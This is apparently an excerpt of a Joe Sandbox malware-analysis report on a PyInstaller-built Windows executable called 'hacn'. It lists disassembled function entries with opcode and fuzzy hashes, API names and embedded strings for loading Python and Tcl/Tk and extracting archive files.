                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                          • Instruction ID: ec7e0f5cf0b1735b9ae3f304e52a34dd820013a9e0791b1f66fee1b47f0f9e0c
                                                                                          • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                          • Instruction Fuzzy Hash: 87119361B1C642C1EA60BF51D44127DA364BF84B80F8A4931EE8DD7A9BDF3CD4408718
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                                          • Instruction ID: 8d27aa9fae4bdba7a4230d4912623237aebc797bf13a94084663ddf85893ff89
                                                                                          • Opcode Fuzzy Hash: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                                          • Instruction Fuzzy Hash: B621AF72A1CA81C6EB61BF18D48037972A0EB94B94F944334EE6DC66D9DF3DD8108B04
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                          • Instruction ID: ff659784e79eb9c85440395b47ecb509639b00c2515a2f7d62681186a0fcde34
                                                                                          • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                          • Instruction Fuzzy Hash: 52016161B0CB41C1EA04FB52D900169A695BF85FE4F8A4A31EE6C97BD6CE3CE5018718
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
                                                                                          • Instruction ID: ecabee26575e47fb2f3830c2237d64096b95cce17b05906e1a15a74b1aff407c
                                                                                          • Opcode Fuzzy Hash: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
                                                                                          • Instruction Fuzzy Hash: A1018020E1D742C0FA60BBA3E981179299DAF507A4FD64A34ED1EC36D6DE2CF4418349
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF64778BAA6,?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02), ref: 00007FF64778F2AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                          • Instruction ID: cd716cedfa5fe3d53c284d9aecd9e4b0359958cc0817e69164f76a6b3cee4ceb
                                                                                          • Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                          • Instruction Fuzzy Hash: 53F01D59B0E606D1FE54B7A5D4512BD62915F9DB90FCD4430CD0ECA7D1DE1CE4818628
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,?,?,00007FF647780E24,?,?,?,00007FF647782336,?,?,?,?,?,00007FF647783929), ref: 00007FF64778DCFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                          • Instruction ID: 7c6b140f6bb7bf7db92b297c3cba053c29d6e41bbaeeba56655c4b4d3af5aaca
                                                                                          • Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                          • Instruction Fuzzy Hash: A5F05840B0D246D5FE647762D85037512909F98BA0F8A8630DD2ECE2C2DE6CA8508228
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                          • Instruction ID: 5f5ff8e5ecb2a840b8b474a5e8db0de9d1b9569a74e0a37489a0846200ece79b
                                                                                          • Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                          • Instruction Fuzzy Hash: E8E0EC64F0C306C2FB157BE3C9825B821164F14351F925431EE0A8A3C3DE1CA8469679
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                          • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                          • API String ID: 2446303242-1601438679
                                                                                          • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                          • Instruction ID: fd433c347e223f2d58e518a47bc1fa0e99f97fb2ab443d34a69a3fb7cdf19be9
                                                                                          • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                          • Instruction Fuzzy Hash: E6A14576608B85C6E714EF21E45479AB360FB88B84F90412AEF9D83B24CF3DE164CB44
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3140674995-0
                                                                                          • Opcode ID: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                                          • Instruction ID: b850aa43fda1cb7375cb7b01eb66d12eb4b31d3b141f91a79e812f988a9a9e07
                                                                                          • Opcode Fuzzy Hash: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                                          • Instruction Fuzzy Hash: 79313E72609A81C6EB60BF60E8407ED7365FB98748F84443ADA4D87A94DF38D648C718
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1239891234-0
                                                                                          • Opcode ID: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                                          • Instruction ID: e76022d6409f48cacb7ad11e3c524ba6742ddd7192b29436276dd335c29fa924
                                                                                          • Opcode Fuzzy Hash: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                                          • Instruction Fuzzy Hash: 7A317332608B81C6EB60EF25E8402AE73A4FB88754F910536EE8D83B68DF3CD555CB04
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2227656907-0
                                                                                          • Opcode ID: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
                                                                                          • Instruction ID: 78b0a39f6bdcb8ac2f1b44911a985a9e812be0704cf3a62ed96c8278b350dd50
                                                                                          • Opcode Fuzzy Hash: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
                                                                                          • Instruction Fuzzy Hash: 80B1D3A2B1E682C1FA60FB22DA005B96351EB64BE4F854131EF5D87BD5DE3CE445C308
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                          • API String ID: 190572456-4266016200
                                                                                          • Opcode ID: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                                          • Instruction ID: 1cec2e6d1bb4dab7240a1d504777bcd3aeefa3893e5fcfb38cfd9083e5259b9b
                                                                                          • Opcode Fuzzy Hash: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                                          • Instruction Fuzzy Hash: 2D127CE4A4EB03D1FE55FB28AC5117426A2AF29794FD46835CC0ED62A4EF7CF558820C
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                          • API String ID: 190572456-2208601799
                                                                                          • Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                          • Instruction ID: 3a536661349f05444bad9fa7ba35cb0ea6e6bdc31bd08bfbf8169108362ded75
                                                                                          • Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                          • Instruction Fuzzy Hash: AFE1BEA4A1EB43D1FA59BB19A89117423A5EF24794FD49435CC0EC63A8EFBCF548830C
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message_fread_nolock
                                                                                          • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                          • API String ID: 3065259568-2316137593
                                                                                          • Opcode ID: b82510a0132d6c3f7a1a00662aac91967cc70fc2dc9055a249cbe177eb6fa99c
                                                                                          • Instruction ID: e690f0cd5099a3525b1a82deb3da532a6d658e78f171e371f4e79040d1104310
                                                                                          • Opcode Fuzzy Hash: b82510a0132d6c3f7a1a00662aac91967cc70fc2dc9055a249cbe177eb6fa99c
                                                                                          • Instruction Fuzzy Hash: 1151AD61A0D682C6FA20BB21A8516FA6394EF847C4FD04431EE5DC7B96EE7CF545C348
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                          • String ID: P%
                                                                                          • API String ID: 2147705588-2959514604
                                                                                          • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                          • Instruction ID: e4c69914866510cd258ef8574464971de9337f4612f5f863e2ae0ac817e63a9d
                                                                                          • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                          • Instruction Fuzzy Hash: F751F8666187A1C6E634AF26E0181BAB7A1F798B61F404121EFDE83694DF3CD085DB14
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,00007FF647772A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647778597
                                                                                          • FormatMessageW.KERNEL32 ref: 00007FF6477785C6
                                                                                          • WideCharToMultiByte.KERNEL32 ref: 00007FF64777861C
                                                                                            • Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
                                                                                            • Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
